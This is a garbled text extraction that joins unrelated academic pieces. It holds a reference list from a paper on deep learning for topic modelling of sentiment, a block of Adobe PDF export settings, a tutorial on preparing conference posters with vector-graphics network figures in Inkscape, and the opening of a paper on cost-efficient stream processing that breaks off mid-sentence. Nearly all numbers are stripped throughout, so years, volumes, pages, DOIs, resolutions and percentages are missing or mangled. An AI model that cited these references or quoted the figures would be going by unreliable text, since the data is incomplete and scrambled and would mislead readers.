machine intelligence ( ): – doi . /tpami. . . bengio y, courville ac, vincent p. . unsupervised feature learning and deep learning: a review and new perspectives. available at http://arxiv.org/abs/ . . blei d, carin l, dunson d. . probabilistic topic models. ieee signal processing magazine ( ): – doi . /msp. . . blei dm. . probabilistic topic models. communications of the acm ( ): – doi . / . . blei dm, ng ay, jordan mi. . latent dirichlet allocation. journal of machine learning research ( – ): – . blitzer j, dredze m, pereira f. . biographies, bollywood, boom-boxes and blenders: domain adaptation for sentiment classification. in: proceedings of the th annual meeting of the association of computational linguistics. prague: association for computational linguistics, vol. , – . bollegala d, weir d, carroll j. . cross-domain sentiment classification using a sentiment sensitive thesaurus. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . bourlard h, kamp y. . auto-association by multilayer perceptrons and singular value decomposition. biological cybernetics ( – ): – doi . /bf . al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / http://dx.doi.org/ . /tpami. . http://arxiv.org/abs/ . http://dx.doi.org/ . /msp. . http://dx.doi.org/ . / . http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bradley mm, lang pj. . affective norms for english words (anew): instruction manual and affective ratings. technical report c- . the center for research in psychophysiology, university of florida. bravo-marquez f, mendoza m, poblete b. . combining strengths, emotions and polarities for boosting twitter sentiment analysis. in: proceedings of the second international workshop on issues of sentiment discovery and opinion mining. new york: association for computing machinery, . cambria e, havasi c, hussain a. . senticnet : a semantic and affective resource for opinion mining and sentiment analysis. in: proceedings of the th international florida artificial intelligence research society conference. – . canini k, shi l, griffiths t. . online inference of topics with latent dirichlet allocation. in: proceedings of the twelth international conference on artificial intelligence and statistics. – . clement j. . number of monthly active twitter users worldwide from st quarter to st quarter . available at https://www.statista.com/statistics/ /number-of-monthly-active- twitter-users/. collobert r, weston j, bottou l, karlen m, kavukcuoglu k, kuksa p. . natural language processing (almost) from scratch. journal of machine learning research (august): – . dang y, zhang y, chen h. . a lexicon-enhanced method for sentiment classification: an experiment on online product reviews. ieee intelligent systems ( ): – doi . /mis. . . eguchi k, lavrenko v. . sentiment retrieval using generative models. in: proceedings of the conference on empirical methods in natural language processing. stroudsburg: association for computational linguistics, – . erhan d, bengio y, courville a, manzagol p-a, vincent p, bengio s. . why does unsupervised pre-training help deep learning? journal of machine learning research : – . esuli a, sebastiani f. . sentiwordnet: a publicly available lexical resource for opinion mining. in: proceedings of the fifth international conference on language resources and evaluation (lrec’ ). genoa: european language resources association (elra). vol. , – . go a, bhayani r, huang l. . twitter sentiment classification using distant supervision. cs n project report. , stanford university, . green d, swets j. . signal detection theory and psychophysics. society : . hinton ge, osindero s, teh y-w. . a fast learning algorithm for deep belief nets. neural computation ( ): – doi . /neco. . . . . hinton ge, salakhutdinov rr. . reducing the dimensionality of data with neural networks. science ( ): – doi . /science. . hinton ge, zemel rs. . autoencoders, minimum description length, and helmholtz free energy. advances in neural information processing systems : . hofmann t. . probabilistic latent semantic analysis. in: proceedings of the fifteenth conference on uncertainty in artificial intelligence. burlington: morgan kaufmann publishers, – . hong j, fang m. . sentiment analysis with deeply learned distributed representations of variable length texts. stanford: stanford university. huh s, fienberg se. . discriminative topic modeling based on manifold learning. acm transactions on knowledge discovery from data (tkdd) ( ): – doi . / . . al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.statista.com/statistics/ /number-of-monthly-active-twitter-users/ https://www.statista.com/statistics/ /number-of-monthly-active-twitter-users/ http://dx.doi.org/ . /mis. . http://dx.doi.org/ . /neco. . . . http://dx.doi.org/ . /science. http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ japkowicz n, hanson sj, gluck ma. . nonlinear autoassociation is not equivalent to pca. neural computation ( ): – doi . / . jo y, oh ah. . aspect and sentiment unification model for online review analysis. in: proceedings of the fourth acm international conference on web search and data mining. new york: acm, – . kalchbrenner n, grefenstette e, blunsom p. . a convolutional neural network for modelling sentences. available at http://arxiv.org/abs/ . . kennedy a, inkpen d. . sentiment classification of movie reviews using contextual valence shifters. computational intelligence ( ): – doi . /j. - . . .x. lakkaraju h, socher r, manning c. . aspect specific sentiment analysis using hierarchical deep learning. in: deep learning and representation learning workshop at nips, december , montreal. li s, huang c-r, zhou g, lee sym. . employing personal/impersonal views in supervised and semi-supervised sentiment classification. in: proceedings of the th annual meeting of the association for computational linguistics. stroudsburg: association for computational linguistics, – . lin c, he y. . joint sentiment/topic model for sentiment analysis. in: proceedings of the th acm conference on information and knowledge management. new york: acm, – . liu b. . sentiment analysis and opinion mining. synthesis lectures on human language technologies ( ): – doi . /s ed v y hlt . maas al, daly re, pham pt, huang d, ng ay, potts c. . learning word vectors for sentiment analysis. in: proceedings of the th annual meeting of the association for computational linguistics: human language technologies. stroudsburg: association for computational linguistics, vol. , – . macmillan na, creelman cd. . detection theory: a user’s guide. hove: psychology press. mcauliffe jd, blei dm. . supervised topic models. in: advances in neural information processing systems. – . mei q, ling x, wondra m, su h, zhai c. . topic sentiment mixture: modeling facets and opinions in weblogs. in: proceedings of the th international conference on world wide web. new york: acm, – . mirowski p, ranzato m, lecun y. . dynamic auto-encoders for semantic indexing. in: proceedings of the nips, workshop on deep learning, – . mohammad sm, turney pd. . crowdsourcing a word-emotion association lexicon. computational intelligence ( ): – doi . /j. - . . .x. neri p. . how inherently noisy is human sensory processing? psychonomic bulletin & review ( ): – doi . /pbr. . . . ngiam j, chen z, koh pw, ng ay. . learning deep energy models. in: proceedings of the th international conference on machine learning (icml- ). madison: omnipress, – . nguyen dq, nguyen dq, vu t, pham sb. . sentiment classification on polarity reviews: an empirical study using rating-based features. in: proceedings of the th workshop on computational approaches to subjectivity, sentiment and social media analysis. stroudsburg: association for computational linguistics, – . nielsen fÅ. . a new anew: evaluation of a word list for sentiment analysis in microblogs. available at http://arxiv.org/abs/ . . al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://arxiv.org/abs/ . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /s ed v y hlt http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /pbr. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pang b, lee l. . a sentimental education: sentiment analysis using subjectivity summarization based on minimum cuts. in: proceedings of the nd annual meeting on association for computational linguistics. stroudsburg: association for computational linguistics. pang b, lee l. . seeing stars: exploiting class relationships for sentiment categorization with respect to rating scales. in: proceedings of the rd annual meeting on association for computational linguistics. stroudsburg: association for computational linguistics, – . pang b, lee l, vaithyanathan s. . thumbs up? sentiment classification using machine learning techniques. in: proceedings of the acl- conference on empirical methods in natural language processing. stroudsburg: association for computational linguistics, vol. , – . perotte aj, wood f, elhadad n, bartlett n. . hierarchically supervised latent dirichlet allocation. in: proceedings of the th international conference on neural information processing systems, – . pollack jb. . recursive distributed representations. artificial intelligence ( ): – doi . / - ( ) -k. porteous i, newman d, ihler a, asuncion a, smyth p, welling m. . fast collapsed gibbs sampling for latent dirichlet allocation. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . pouransari h, ghili s. . deep learning for sentiment analysis of movie reviews. available at https://cs d.stanford.edu/reports/pouransarihadi.pdf. riloff e, wiebe j, phillips w. . exploiting subjectivity classification to improve information extraction. in: proceedings of aaai- , the th national conference on artificial intelligence. menlo park: aaai press, vol. , . saif h, fernandez m, he y, alani h. . evaluation datasets for twitter sentiment analysis: a survey and a new dataset, the sts-gold. in: st international workshop on emotion and sentiment in social and expressive media: approaches and perspectives from ai (essem ). turin, italy. shirani-mehr h. . applications of deep learning to sentiment analysis of movie reviews. available at https://cs d.stanford.edu/reports/shirani-mehrh.pdf. smith g. . amazing facebook statistics and facts for : by the numbers. available at http://expandedramblings.com/index.php/by-the-numbers- -amazing-facebook-stats. socher r, pennington j, huang eh, ng ay, manning cd. . semi-supervised recursive autoencoders for predicting sentiment distributions. in: proceedings of the conference on empirical methods in natural language processing. stroudsburg: association for computational linguistics, – . socher r, perelygin a, wu jy, chuang j, manning cd, ng ay, potts c. . recursive deep models for semantic compositionality over a sentiment treebank. in: proceedings of the conference on empirical methods in natural language processing (emnlp). seattle: association for computational linguistics, – . spacy. . spacy large core english model. available at https://spacy.io/usage/models. tang d, wei f, qin b, liu t, zhou m. a. coooolll: a deep learning system for twitter sentiment classification. in: proceedings of the th international workshop on semantic evaluation (semeval ). dublin: association for computational linguistics, – . tang d, wei f, yang n, zhou m, liu t, qin b. b. learning sentiment-specific word embedding for twitter sentiment classification. in: proceedings of the nd annual meeting of the association for computational linguistics. baltimore: association for computational linguistics, – . al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / - ( ) -k https://cs d.stanford.edu/reports/pouransarihadi.pdf https://cs d.stanford.edu/reports/shirani-mehrh.pdf http://expandedramblings.com/index.php/by-the-numbers- -amazing-facebook-stats https://spacy.io/usage/models http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ teh yw, jordan mi, beal mj, blei dm. . sharing clusters among related groups: hierarchical dirichlet processes. in: proceedings of the th international conference on neural information processing systems. – . thelwall m, buckley k, paltoglou g. . sentiment strength detection for the social web. journal of the american society for information science and technology ( ): – doi . /asi. . umich. . umich si —sentiment classification. available at https://www.kaggle.com/c/si winter . vincent p, larochelle h, lajoie i, bengio y, manzagol p-a. . stacked denoising autoencoders: learning useful representations in a deep network with a local denoising criterion. journal of machine learning research : – . voegtlin t, dominey pf. . linear recursive distributed representations. neural networks ( ): – doi . /j.neunet. . . . whitelaw c, garg n, argamon s. . using appraisal groups for sentiment analysis. in: proceedings of the th acm international conference on information and knowledge management. new york: acm, – . wilson t, wiebe j, hoffmann p. . recognizing contextual polarity in phrase-level sentiment analysis. in: proceedings of the conference on human language technology and empirical methods in natural language processing. stroudsburg: association for computational linguistics, – . wu jy, pao y. . predicting sentiment from rotten tomatoes movie reviews. available at https://nlp.stanford.edu/courses/cs n/ /reports/wujean_paoyuanyuan_ nreport.pdf. zhu j, ahmed a, xing ep. . medlda: maximum margin supervised topic models for regression and classification. in: proceedings of the th annual international conference on machine learning. new york: acm, – . zirn c, niepert m, stuckenschmidt h, strube m. . fine-grained sentiment analysis with structural features. in: proceedings of th international joint conference on natural language processing. chiang mai: asian federation of natural language processing, – . al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /asi. https://www.kaggle.com/c/si winter http://dx.doi.org/ . /j.neunet. . . https://nlp.stanford.edu/courses/cs n/ /reports/wujean_paoyuanyuan_ nreport.pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ beyond the topics: how deep learning can improve the discriminability of probabilistic topic modelling introduction related work methods data sets and experiments results discussion conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice microsoft word - volume _final insna.org | issues & | volume | creating a conference poster with high-resolution network figures jürgen pfeffer technical university of munich bavarian school of public policy abstract creating a poster with high-resolution network images can be a challenging task. in this arti- cle, the process of exporting a network figure from a network analysis tool, importing it in a vector graphics tool, and preparing the poster for print is discussed. the steps include critical strategies for producing print-quality figures that also apply to the preparation of network fig- ures for journal publication. we discuss different file formats and argue that the favorite tool for creating conference posters – microsoft powerpoint – is not suitable for posters that in- clude network figures. instead, we suggest the use of inkscape, a free and open-source tool, or a comparable vector graphics tool to prepare your posters. the goal of this article is to provide a tutorial-like description of the critical steps for creating a conference poster with high- resolution network figures. author jürgen pfeffer is professor of computational social science and big data at the bavarian school of public policy at technical university of munich. his research deals with the analy- sis of large and dynamic social, political and economic systems as well as with methodologi- cal, algorithmic and theoretical challenges arising from these analyses. pfeffer’s work is at the interface between social sciences and computer sciences. connections creating a conference poster | volume | issues & | insna.org . introduction visualization is crucial for the develop- ment of a scientific field (crosby, ; freeman, ). network visualizations are great ways to present the results of sci- entific projects. much of the attention of research related to network visualization has focused on positioning the nodes in the figure, i.e. the layout of the network (brandes, freeman & wagner, ; eades, ). recently, the focus of inter- est in the context of network visualization has shifted to using visual elements for mapping multivariate information to net- work images (hennig, brandes, pfeffer & mergel, ; krempel, , ; pfef- fer, ). however, when it comes to creating a poster with a network figure, these map- ping strategies cover only some of the nec- essary steps. table shows the entire pro- cess of creating a network poster from pre- processing the network data to completion of the poster by the print shop. in this arti- cle we discuss the technical details of the points “export figure,” “import network figure” in a vector graphics tool, and also “save poster for printing.” we also offer short comments on “transfer poster file to printer”. these crucial steps for creating a poster with a high-resolution network fig- ure are described below. it is important to notice that all of these steps are essential and not optional. we do not discuss gen- eral aspects of poster layout, e.g. arranging text and figures; the focus is on the quality of the network figures on the poster. most of the strategies discussed here also apply to preparing network fig- ures for print publications. in poster crea- tion, many roads can lead to success (or failure). in the following, several decisions have been made and, for the sake of sim- plicity, only a few of the possible alterna- tives are discussed. the goal here is to provide a tutorial text that will work for most scholars irrespective of their current knowledge or experience.   table : workflow of creating a poster with a network figure. steps in bold are discussed in this text. . export network figure the first challenge is to save your network figure in your favorite sna tool as a vec- tor graphics file. in vector graphics, net- work drawings are stored as polygons. in other words, a circular node is stored with x/y coordinates, as well as with the radius and the color information for filling the circle. a link is stored with both pairs of x/y coordinates of the nodes that this link is connecting. when this file is read and the network is drawn, it literally gets drawn circle by circle and line by line. in contrast, raster format files were developed to store images created from photos. stor- ing a photo can be imagined as putting a raster over the image and storing infor- mation for every cell (pixel) of this raster. while this is a fine approach for storing images from digital cameras, the right- hand images in figure show the problem that results when storing network figures. images that may look good on screen can have very poor resolution on a poster, pre-processing  sna tool  vector graphics tool  poster printing • prepare network data • create layout • import network figure • transfer poster file • prepare attributes • map information • create poster • print poster • import data • export figure • save poster for printing • get poster to conference creating a conference poster connections insna.org | issues & | volume | which will be much larger than the screen. the reason for the pixelated effect is that zooming a raster image merely makes the raster larger. on the other hand, a circle from a vector graphics file gets drawn larger by, literally, drawing a circle with a larger radius and a line stays a line, just with different coordinates. consequently, you can endlessly zoom in at the vector graphics file without losing any resolution quality. figure : a network node and a link stored in a vector graphics file (left) and in a raster file (right) export as pdf/eps. there are two very popular file formats for vector graphics: adobe’s pdf (portable docu- ment format), and eps (encapsulated postscript). although there are significant differences between these two file formats, they can be used interchangeably in current software programs. so, the first step in creating a poster with a decent network visualization is to export the network drawing as a pdf or eps. there are also other file formats that will do the job, e.g. svg (scalable vector graphics) or even a format for three-dimensional graphics such as vrml (virtual reality modeling lan- guage). netdraw, the visualization tool of ucinet (borgatti, everett, & freeman, ), does not support pdf/eps. instead, with netdraw, it is possible to export a network drawing as a “metafile,” e.g. emf (enhanced metafile) and (wmf) windows metafile. the logic of these file formats is similar to pdf/eps, and most vector graphics tools (see next section) can import them. the decision on which to choose for your preferred file format will depend on positive answers to these three questions: is the format made for vector graphics? can my sna tool export files with this format? can my graphics tools import files with this format? if none of the above-mentioned file formats is available in your favorite net- work tool, then there is one last option: you can use a pdf creator tool, e.g. adobe acrobat or primopdf, and print the net- work into a pdf. however, this approach is not always successful when it comes to the next step, described in the following section. independently from how you ex- tract a vector graphics file from your fa- vorite sna tool, this step is critical and cannot be bypassed. in other words, you should only use a tool that offers a vector graphics export option. if the tool you’ve selected does not offer that, you should not use it. or, you could call upon the authors of the tool to add this feature! never use jpg. there is one file format that should never be used for ex- porting network figures: jpg or jpeg, an acronym for joint photographic experts group, a committee that created this stand- ard. jpg files are often used for photos from cameras or phones because they compress the image data before storing it. the compression works well enough for photos because the human eye does not need to distinguish among a vast number of shades of blue to recognize the sky in a photo. but with network drawings, the jpg data compression has tremendous ill ef- fects on the quality of the figure. the most obvious distortion is that blurry areas will be drawn around lines as the jpg compres- sion algorithm tries to interpolate a gray area between the black line and the white background. png can be not so bad. if you are stuck with a tool that has no vector- to answer this question, google and wikipedia can help. connections creating a conference poster | volume | issues & | insna.org graphics export option, you should export your network figure as png (portable network graphics). don’t be confused by the word network; png is a raster file for- mat and therefore not preferable for net- work drawings. however, the png is a lossless compression format, so that the blurry areas of the jpg can be avoided. the pixel effect from zooming (see figure ) is still an issue for png. this can be (in part) overcome by creating the png with high resolution – if the sna tool offers this option. raster graphics resolution is described in dpi (dots per inch). the hu- man eye needs about dpi in order not to see the actual pixels. this means that a x inch area on paper should have x = pixels. when you use an im- age with dpi for your poster and you re-size it to % to better fit your poster space, the area of pixels in the raster gets five times larger, resulting in an image with dpi. at this resolution humans can easily discern pixels, and this reduces the visual quality of the network drawing on a poster. consequently, or even , dpi should be used – but this will create huge files. in a nutshell, then, while png files can create decent network imag- es, vector graphics files will always have better resolution and will look better on your poster. . graphics tools here is the bad news. you cannot use powerpoint (or its freely available emula- tions) for creating your poster because these tools cannot handle vector graphics files. instead, we need to turn to tools that are optimized for vector graphics file for- mats. adobe illustrator is a widely used (but costly) tool for this purpose. however, there are freely available alternatives to il- lustrator. for the purposes of this article we use inkscape, as it is freely available for windows, mac, and linux. an easy test for whether a tool qualifies for our purpose is to import the vector graphics download and tutorial: https://www.inkscape.org/ file that you have extracted as described above, and zoom in as far as possible on a single node. if you can still see a nicely drawn circle, then this tool can handle vec- tor graphic files. if you see pixels similar to the right-hand images of figure , then this tool does not qualify for the task of creating a poster with a high-resolution network image. to bring into inkscape a network drawing that is stored in a vector graphics file, select file/import and import the net- work to your open poster document. now, zoom in thousands of percentages to dou- ble-check the correct transfer of your vec- tor graphics-based network image. when you zoom out again and click on the net- work, you will see that the imported net- work is an object that can be moved around and changed in size. if you change the size make sure to hold the ctrl key while doing that so as to preserve the height/width ratio of the image. inkscape is very intuitive and many tutorials can be found online that will help you to add the additional text, logo, and other visual ele- ments needed for your poster. handling accented characters. when you have finished your poster lay- out, make sure that you save it as a pdf as this is the preferred file format of poster print shops. there is one more trick that is especially important if your poster contains special fonts or non-english characters. if you select all objects of your poster (press ctrl-a) and then select path/object to path in the menu, then all text will also be trans- formed to paths, i.e. vector graphics ob- jects. consequently, the poster printer can print your poster even if the language or font is not installed on the printer’s com- puter. without this step, the print process could change your font and replace some characters with interesting-looking special characters. transforming fonts to paths should be the very last step before storing the poster as a pdf for the print shop. be aware that you cannot change any text af- ter this transformation step. creating a conference poster connections insna.org | issues & | volume | . poster printing the process of actually printing the poster is straightforward if you have created a pdf in a similar way to the process de- scribed above. here are some additional comments that should make your life easi- er and your poster more attractive:  before starting to work on your poster, go to the conference website and figure out the size of the poster boards as well as whether the post- ers should be in portrait or land- scape orientation.  spend the extra few bucks and go for the gloss paper – you will love it. in any case, try to avoid very thin (light) paper.  if the poster session is not during the first evening of the conference, think about printing the poster close to the conference venue. for instance, in the united states most fedex shops print posters. call a week before the conference and double-check that a) the print shop actually exists, b) it is at the place that google tells you, and c) the person doing the prints will accept print orders via email or file down- load.  good-quality posters can result in large pdf files. if your file is larger than mb, use a file transfer ser- vice, e.g. https://www.wetransfer.com/  get a poster tube for transporting your poster – yes, these tubes can be part of your cabin luggage, no check-in necessary. but don’t let the poster sit in that tube for two weeks or it will become hard to un- roll. . an example to illustrate the significant differences be- tween a vector graphics file and a raster format file we use a partial reproduction of a very old network visualization. in an ef- fort to create an encyclopedia of the natu- ral sciences, georges-louis leclerc, comte de buffon, visualized dog breeds and their relationships (buffon, ; mayer, ). the left-hand image in fig- ure was created along the lines of the process described above. the result is a clearly printed high-resolution image that could also be printed in any size on a post- er. the right-hand side is a low-resolution jpg file that was enlarged for printing. one can easily see the effects described above: blurry lines and text as well as pixe- lation. this example also shows that the above-mentioned process is important for network figures in journal articles. figure : partial reconstruction of buffon’s dog breeds and their relationships; comparison of printing quality of vector graphics file (left) and raster file (right). connections creating a conference poster | volume | issues & | insna.org references borgatti, s.p., everett, m.g. & freeman, l.c. ( ). ucinet for windows: software for social network analysis. harvard, ma: analytic technologies. brandes, u., freeman, l.c. & wagner, d. ( ). so- cial networks. in r. tamassia, handbook of graph drawing and visualization (pp. – ). boca raton, fl: crc press. buffon, g.-l.l., comte de ( ). histoire naturelle, générale et particulière. vol. le chien avec ses variétés. paris: imprimerie royale. crosby, a.w. ( ). the measure of reality: quan- tification in western europe, - . new york, ny: cambridge university press. eades, p. ( ). a heuristic for graph drawing. congressus numerantium, ( ), pp. – . freeman, l.c. ( ). visualizing social networks, journal of social structure, ( ). hennig, m., brandes, u., pfeffer, j., & mergel, i. ( ). studying social networks. a guide to em- pirical research. frankfurt: campus verlag. krempel, l. ( ). visualisierung komplexer strukturen: grundlagen der darstellung mehrdimensionaler netzwerke (auflage: . sonderband auflage). frankfurt am main: campus verlag. krempel, l. ( ). network visualization. in j. scott & p.j. carrington (eds.), the sage handbook of social network analysis (pp. – ). thousand oaks, ca: sage publications. mayer, k. ( ). network visualization. historical fragments of a visual culture. in m. füllsack (ed.), networking networks, origins, applications, ex- periments. university of graz, at: institute of systems sciences, innovation and sustainability research report # (pp. – ). pfeffer, j. ( ). visualization of political networks. in: j.n. victor, a.h. montgomery, m. lubell (eds.), the oxford handbook of political net- works. oxford university press, pp. – . cost-efficient enactment of stream processing topologies cost-efficient enactment of stream processing topologies christoph hochreiner , michael vögler , stefan schulte and schahram dustdar distributed systems group, tu wien, vienna, austria tu wien, vienna, austria abstract the continuous increase of unbound streaming data poses several challenges to established data stream processing engines. one of the most important challenges is the cost-efficient enactment of stream processing topologies under changing data volume. these data volume pose different loads to stream processing systems whose resource provisioning needs to be continuously updated at runtime. first approaches already allow for resource provisioning on the level of virtual machines (vms), but this only allows for coarse resource provisioning strategies. based on current advances and benefits for containerized software systems, we have designed a cost-efficient resource provisioning approach and integrated it into the runtime of the vienna ecosystem for elastic stream processing. our resource provisioning approach aims to maximize the resource usage for vms obtained from cloud providers. this strategy only releases processing capabilities at the end of the vms minimal leasing duration instead of releasing them eagerly as soon as possible as it is the case for threshold-based approaches. this strategy allows us to improve the service level agreement compliance by up to % and a reduction for the operational cost of up to %. subjects adaptive and self-organizing systems, distributed and parallel computing keywords data stream processing, cloud computing, resource elasticity, resource optimization introduction due to the transition toward a data-centric society, today’s stream processing engines (spes) need to deal with a continuous increase of unbound streaming data regarding volume, variety, and velocity (mcafee et al., ). currently, this growth in data is mainly driven by the rise of the internet of things (iot) (http://www.gartner.com/newsroom/id/ ). sensors, which represent a vital part of the iot, emit a huge volume of streaming data that needs to be processed to provide additional value to users or to trigger actions for iot devices or other services, e.g., to handle user notifications. furthermore, many scenarios call for data processing in near real-time, which requires the application of spes like system s (gedik et al., ), apache storm (toshniwal et al., ), heron (kulkarni et al., ), or apache spark (zaharia et al., ). state-of-the-art spes provide the user with an extensive set of apis to design and enact stream processing topologies. these topologies represent a composition of different stream processing operators, like filters, transformations, or other operations, which are required to process data (gedik et al., ). although spes are highly efficient regarding data processing, they struggle with varying volumes of data over time (hochreiner et al., ). because most spes operate on a fixed how to cite this article hochreiner et al. ( ), cost-efficient enactment of stream processing topologies. peerj comput. sci. :e ; doi . /peerj-cs. submitted june accepted november published december corresponding author christoph hochreiner, c.hochreiner@infosys.tuwien.ac.at academic editor daniele d’agostino additional information and declarations can be found on page doi . /peerj-cs. copyright hochreiner et al. distributed under creative commons cc-by . http://www.gartner.com/newsroom/id/ http://dx.doi.org/ . /peerj-cs. mailto:c.�hochreiner@�infosys.�tuwien.�ac.�at https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ amount of computational resources, e.g., on clusters, they cannot adapt to changes of the data volume at runtime (hochreiner et al., a). one solution for this issue is the over- provisioning of computational resources so that the spe can process any amount of incoming data while complying with given service level agreements (slas). while this approach ensures a high level of sla compliance, it is not cost-efficient because the provisioned computational resources are not used most of the time. the more economically feasible approach to this challenge is under-provisioning, where an spe is equipped with computational resources to cover most of the incoming data scenarios. however, in the case of under-provisioning, the spe may cover most scenarios, but it may also violate slas in some high load scenarios, due to a delay in the data processing. based on the 